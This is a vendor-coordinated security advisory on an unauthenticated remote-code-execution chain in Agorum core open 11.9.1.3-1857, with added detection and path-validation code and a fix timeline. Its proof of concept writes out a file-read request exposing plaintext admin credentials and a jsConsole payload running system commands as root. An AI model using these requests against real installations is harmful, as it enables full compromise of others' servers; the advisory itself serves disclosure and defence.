usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Unauthenticated Remote Code Execution Chain
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Not requested
CVE Link: Not requested
Advisory ID: usd-2025-0030

Description

Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Our researchers discovered multiple vulnerabilities in agorum core that, when chained together, allow an unauthenticated attacker to achieve full remote code execution with root privileges. This critical flaw enables complete system compromise without prior authentication.

Proof of Concept

The exploit chain consists of three distinct vulnerabilities. The initial entry point, identified as usd-2025-0022, allows unauthenticated attackers to read arbitrary files. By exploiting this flaw, an attacker can retrieve the application's configuration file identified in usd-2025-0023, which contains plaintext credentials for the mainadmin account. This can be achieved using the following request:

Request:

GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=/opt/agorum/agorumcore/doc/agorum-core-datasheet.txt HTTP/1.1
Host: localhost
[...]

Response:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Length: 1673
Date: Mon, 05 May 2025 05:45:32 GMT
Server: Apache-Coyote/1.1

Datasheet agorum core:[...]
Access/Protocols: Web-Portal (secure):
https://172.17.0.1:443
Web-Portal (unsecure):
http://172.17.0.1:81
Networkdrive (DMS Filearea):
\\172.17.0.1\dms
Networkdrive (My area):
\\172.17.0.1\private
FTP Access:
172.17.0.1:21
IMAP-Interface:
172.17.0.1:143
SMTP-Interface:
172.17.0.1:2501
Mail-Domain:
agorumcore.com
SMTP-Server:
localhost:25
SMTP-User:
SMTP-Password:
Access data agorum core:
Username (Mainadmin):
roi
Password (Mainadmin: roi):
Changeme123456
Username (Demo):
demo
Password (Demo):
demoAccess
database (mysql):
database-Username:
root
database-Password:
Changeme123456
database-Host:
localhost
database-Port:
3306
[...]

At this stage, the attacker has successfully escalated privileges to the mainadmin level. As identified in usd-2025-0021, users with mainadmin privileges have the ability to execute arbitrary system commands. Since the application runs with root privileges by default, this leads to full system compromise.

Arbitrary command execution can be performed using the jsConsole function via the following request:

POST /api/rest/parse/jsConsole HTTP/1.1
Host: localhost
Cookie: JSESSIONID=[REDACTED];
[...]
js=var%20runCommand%20%3D%20function(cmd)%20%7B%0A%20%20%20%20var%20runtime%20%3D%20java.lang.Runtime.getRuntime()%3B%0A%20%20%20%20var%20process%20%3D%20runtime.exec(cmd)%3B%0A%0A%20%20%20%20var%20reader%20%3D%20new%20java.io.BufferedReader(%0A%20%20%20%20%20%20%20%20new%20java.io.InputStreamReader(process.getInputStream())%0A%20%20%20%20)%3B%0A%0A%20%20%20%20var%20line%3B%0A%20%20%20%20var%20output%20%3D%20%22%22%3B%0A%20%20%20%20while%20((line%20%3D%20reader.readLine())%20!%3D%20null)%20%7B%0A%20%20%20%20%20%20%20%20output%20%2B%3D%20line%20%2B%20%22%5Cn%22%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20reader.close()%3B%0A%20%20%20%20process.waitFor()%3B%0A%20%20%20%20return%20output%3B%0A%7D%3B%0ArunCommand(%22whoami%22)%3B%0A

The payload for the js parameter to execute the whoami command is as follows:

var runCommand = function(cmd) {
    var runtime = java.lang.Runtime.getRuntime();
    var process = runtime.exec(cmd);
    var reader = new java.io.BufferedReader(
        new java.io.InputStreamReader(process.getInputStream())
    );
    var line;
    var output = "";
    while ((line = reader.readLine()) != null) {
        output += line + "\n";
    }
    reader.close();
    process.waitFor();
    return output;
};
runCommand("whoami");

The server response will include the output of the executed command:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://localhost
Date: Mon, 05 May 2025 05:55:46 GMT
Content-Type: application/json;charset=UTF-8
Server: Apache-Coyote/1.1
Content-Length: 145

{
"success":true,
"errorClass":0,
"errorCode":0,
"errorKey":0,
"message":"",
"result":"root\n",
"errorStack":null,
"errorMessage":null,
"executionTime":8
}
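Detection logic for the two requests shown above, as an added example that is not part of this advisory or of agorum core: a Python script that parses constructed Apache combined-format access-log lines, flags getTemp calls whose tmpFile value is an absolute path or contains a parent-directory component, flags POSTs to the jsConsole endpoint, and correlates the two per client address within a time window. The log lines, field names, helper names and the one-hour window are assumptions made for the example.

```python
"""Flag access-log requests matching the usd-2025-0030 chain.

Added example, not part of the usd AG advisory or of agorum core. The two
endpoint paths come from the advisory; everything else here (log lines,
helper names, correlation window) is constructed for the demonstration.
"""
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs, unquote

FILE_READ_PATH = "/dynawebservices/wsfiling/"      # usd-2025-0022 endpoint
JS_CONSOLE_PATH = "/api/rest/parse/jsConsole"      # usd-2025-0021 endpoint

# Constructed sample lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [05/May/2025:05:45:32 +0000] "GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=/opt/agorum/agorumcore/doc/agorum-core-datasheet.txt HTTP/1.1" 200 1673 "-" "curl/8.5.0"
10.0.0.9 - - [05/May/2025:05:46:01 +0000] "GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=report-1234.pdf HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.5 - - [05/May/2025:05:55:46 +0000] "POST /api/rest/parse/jsConsole HTTP/1.1" 200 145 "-" "curl/8.5.0"
10.0.0.7 - - [05/May/2025:05:56:10 +0000] "GET /api/rest/objects/123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def suspicious_tmp_file(value):
    """True if a tmpFile value cannot be a bare name inside a temp directory:
    an absolute POSIX/Windows/UNC path or any '..' component, after decoding
    a possible second layer of percent-encoding."""
    decoded = unquote(value).replace("\\", "/")
    if decoded.startswith("/") or re.match(r"^[A-Za-z]:/", decoded):
        return True
    return any(part == ".." for part in decoded.split("/"))


def classify(ev):
    """Return a finding type for one parsed event, or None if it looks benign."""
    parts = urlsplit(ev["target"])
    if parts.path == FILE_READ_PATH:
        qs = parse_qs(parts.query)
        if qs.get("action") == ["getTemp"]:
            if any(suspicious_tmp_file(v) for v in qs.get("tmpFile", [])):
                return "arbitrary-file-read"
    # Any call to the script console is an admin-level command-execution path
    # and is worth an alert on its own, whatever the response status.
    if parts.path == JS_CONSOLE_PATH and ev["method"] == "POST":
        return "js-console-exec"
    return None


def find_findings(log_text):
    """Run the classifier over raw log text; one dict per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        kind = classify(ev)
        if kind:
            findings.append({"ip": ev["ip"], "ts": ev["ts"],
                             "kind": kind, "status": ev["status"]})
    return findings


def correlate_chain(findings, window_seconds=3600):
    """Client addresses that issued a suspicious file read and then a jsConsole
    call within the window: the order the advisory's chain requires."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], []).append(f)
    chained = []
    for ip, evs in by_ip.items():
        reads = [e["ts"] for e in evs if e["kind"] == "arbitrary-file-read"]
        execs = [e["ts"] for e in evs if e["kind"] == "js-console-exec"]
        if any(0 <= (x - r).total_seconds() <= window_seconds
               for r in reads for x in execs):
            chained.append(ip)
    return sorted(chained)


if __name__ == "__main__":
    found = find_findings(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts'].isoformat()} {f['ip']} {f['kind']} status={f['status']}")
    print("chain suspects:", correlate_chain(found))
```

On the constructed sample the script reports the file read and the jsConsole POST from 10.0.0.5 and names that address as a chain suspect; the relative file name requested by 10.0.0.9 is left alone. Because a successful tmpFile read returns HTTP 200 just like a legitimate one, the detector keys on the parameter shape rather than on the status code.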

Fix

To mitigate this vulnerability chain, we recommend implementing strict authentication and access controls for all sensitive endpoints, especially those exposing file access or administrative functions. Input validation should be enforced to prevent injection attacks, and administrative features like command execution should be disabled by default or restricted to non-root contexts. Additionally, sensitive data such as configuration files and credentials should never be stored in plaintext.
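The input-validation part of the recommendation, as an added example written for this page and not agorum core's own code: a Python containment check that maps a client-supplied temp-file name onto a single directory and rejects absolute paths, path separators and symlinks that resolve elsewhere. The directory layout, file names and function names are constructed for the demonstration; the one real path in it is the datasheet location quoted in the advisory, used here as an input the check must refuse.

```python
"""Confine a user-supplied file name to one directory.

Added example, not agorum core's code: the containment check the Fix section
asks for on a file-serving endpoint, with symlinks resolved before the
containment test. Names and the directory layout are constructed.
"""
import os
import tempfile


class PathOutsideBase(ValueError):
    """Raised when a requested name would resolve outside the permitted directory."""


def resolve_contained(base_dir, requested):
    """Map a client-supplied name onto base_dir, rejecting anything that escapes.

    Rules: the value must be a bare file name (no '/' or '\\', not '.' or '..'),
    and its real path with symlinks followed must stay under base_dir's real
    path. Returns the resolved absolute path on success.
    """
    if (not requested or "/" in requested or "\\" in requested
            or requested in (".", "..")):
        raise PathOutsideBase(f"rejected file name: {requested!r}")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, requested))
    # realpath() has followed any symlink; the target must still be inside base.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathOutsideBase(f"{requested!r} resolves outside {base_real}")
    return candidate


def demo():
    """Exercise the check against a constructed temp directory.

    Creates a legitimate temp file, a file outside the base directory, and a
    symlink inside the base pointing at that outside file. Returns a dict
    mapping each requested name to 'allowed' or 'rejected'.
    """
    outcomes = {}
    with tempfile.TemporaryDirectory() as base, tempfile.TemporaryDirectory() as outside:
        open(os.path.join(base, "report-1234.pdf"), "w").close()
        secret = os.path.join(outside, "config.properties")
        open(secret, "w").close()
        os.symlink(secret, os.path.join(base, "innocent.txt"))
        for name in ("report-1234.pdf",
                     "/opt/agorum/agorumcore/doc/agorum-core-datasheet.txt",
                     "../config.properties",
                     "innocent.txt"):
            try:
                resolve_contained(base, name)
                outcomes[name] = "allowed"
            except PathOutsideBase:
                outcomes[name] = "rejected"
    return outcomes


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:8} {name}")
```

The symlink case is the one a plain string check misses: the requested name is well formed and lives inside the directory, yet it resolves to a file outside it, so the check has to run on the resolved path, not on the input. Containment is the second layer; the first is the authentication the paragraph above calls for, since an endpoint that serves files to unauthenticated callers is a problem even when every path it serves is inside its directory.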

Users of agorum core open can upgrade to 11.9.2 or 11.10.1.

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.